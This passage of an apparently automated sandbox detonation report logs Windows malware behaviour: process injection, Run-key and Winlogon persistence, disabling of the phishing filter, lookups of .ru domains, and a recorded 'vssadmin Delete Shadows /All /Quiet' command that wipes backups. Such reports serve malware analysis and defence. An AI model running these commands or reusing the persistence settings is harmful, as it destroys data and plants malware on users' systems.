PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2532 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Windows\explorer.exe
PID 2532 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Windows\explorer.exe
PID 2532 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Windows\explorer.exe
PID 2532 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Windows\explorer.exe
PID 2296 wrote to memory of 1212 N/A C:\Windows\explorer.exe C:\Windows\Explorer.EXE
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 2760 wrote to memory of 2924 N/A C:\Windows\syswow64\svchost.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2760 wrote to memory of 2924 N/A C:\Windows\syswow64\svchost.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2760 wrote to memory of 2924 N/A C:\Windows\syswow64\svchost.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2760 wrote to memory of 2924 N/A C:\Windows\syswow64\svchost.exe C:\Windows\SysWOW64\ctfmon.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe

"C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe"

C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe

C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\syswow64\svchost.exe

"C:\Windows\syswow64\svchost.exe"

C:\Windows\SysWOW64\ctfmon.exe

ctfmon.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 fsbps.ru udp
US 8.8.8.8:53 cwnlz.ru udp

Files

memory/2696-1-0x0000000000220000-0x0000000000221000-memory.dmp

memory/2696-0-0x0000000000400000-0x0000000000471000-memory.dmp

memory/2532-2-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2696-13-0x0000000000400000-0x0000000000471000-memory.dmp

memory/2532-12-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2532-8-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-6-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-4-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-15-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-16-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-18-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-17-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2296-27-0x00000000FFB50000-0x00000000FFE10000-memory.dmp

memory/2296-25-0x0000000000030000-0x0000000000040000-memory.dmp

memory/1212-22-0x0000000002AB0000-0x0000000002AB9000-memory.dmp

memory/2532-21-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2760-28-0x00000000000C0000-0x00000000000C9000-memory.dmp

memory/2760-31-0x00000000000C0000-0x00000000000C9000-memory.dmp

memory/2760-34-0x00000000000C0000-0x00000000000C9000-memory.dmp

memory/2296-46-0x00000000FFB50000-0x00000000FFE10000-memory.dmp

memory/2760-48-0x00000000000C0000-0x00000000000C9000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:09

Platform

win7-20240903-en

Max time kernel

599s

Max time network

601s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\apoloqop = "\"C:\\Windows\\uricvwef.exe\"" C:\Windows\SysWOW64\explorer.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2384 set thread context of 2104 N/A C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\uricvwef.exe C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\uricvwef.exe C:\Windows\SysWOW64\explorer.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Windows\SysWOW64\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV8 = "0" C:\Windows\SysWOW64\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "0" C:\Windows\SysWOW64\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe

"C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe"

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 money-waterfall.ru udp

Files

memory/2384-0-0x00000000022E0000-0x0000000002630000-memory.dmp

memory/2384-10-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-9-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-8-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-7-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-6-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-5-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-2-0x0000000000400000-0x0000000000445000-memory.dmp

memory/2384-1-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2104-12-0x0000000000100000-0x000000000013C000-memory.dmp

memory/2104-13-0x0000000000100000-0x000000000013C000-memory.dmp

memory/2384-17-0x0000000000400000-0x0000000000445000-memory.dmp

C:\ProgramData\egynegorelydakuf\01000000

MD5 344d179eff7427801b599847c63d232a
SHA1 d363462418f38d8f75361469429a4143b2f803f4
SHA256 99a0358cbbd42544801443e0d729cc1ac6d983da93d248c99170b57c66fd31bc
SHA512 e2e5e6784fe9ff7fbebc118354b1989552b41a650413a2723a402d2f1badabebb72399ff9bfc405a3cedfd03dddf6a4e7144b319eca05dff726cc52369dacc03

memory/2104-21-0x0000000000100000-0x000000000013C000-memory.dmp

memory/2104-24-0x0000000000100000-0x000000000013C000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20241010-en

Max time kernel

599s

Max time network

604s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe" C:\Windows\system32\msiexec.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Windows\Error file remover\Windows Logoff Sound.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\f7879a3.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7B19.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7D5D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\sys.job C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\f7879a3.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7879a6.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI88F5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7DCB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E88.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7879a6.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI88E5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8A50.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8C45.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8DEC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7C42.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7CB1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8935.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8974.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2952 wrote to memory of 1436 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
PID 2952 wrote to memory of 1436 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
PID 2952 wrote to memory of 1436 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
PID 2952 wrote to memory of 1436 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe

"C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

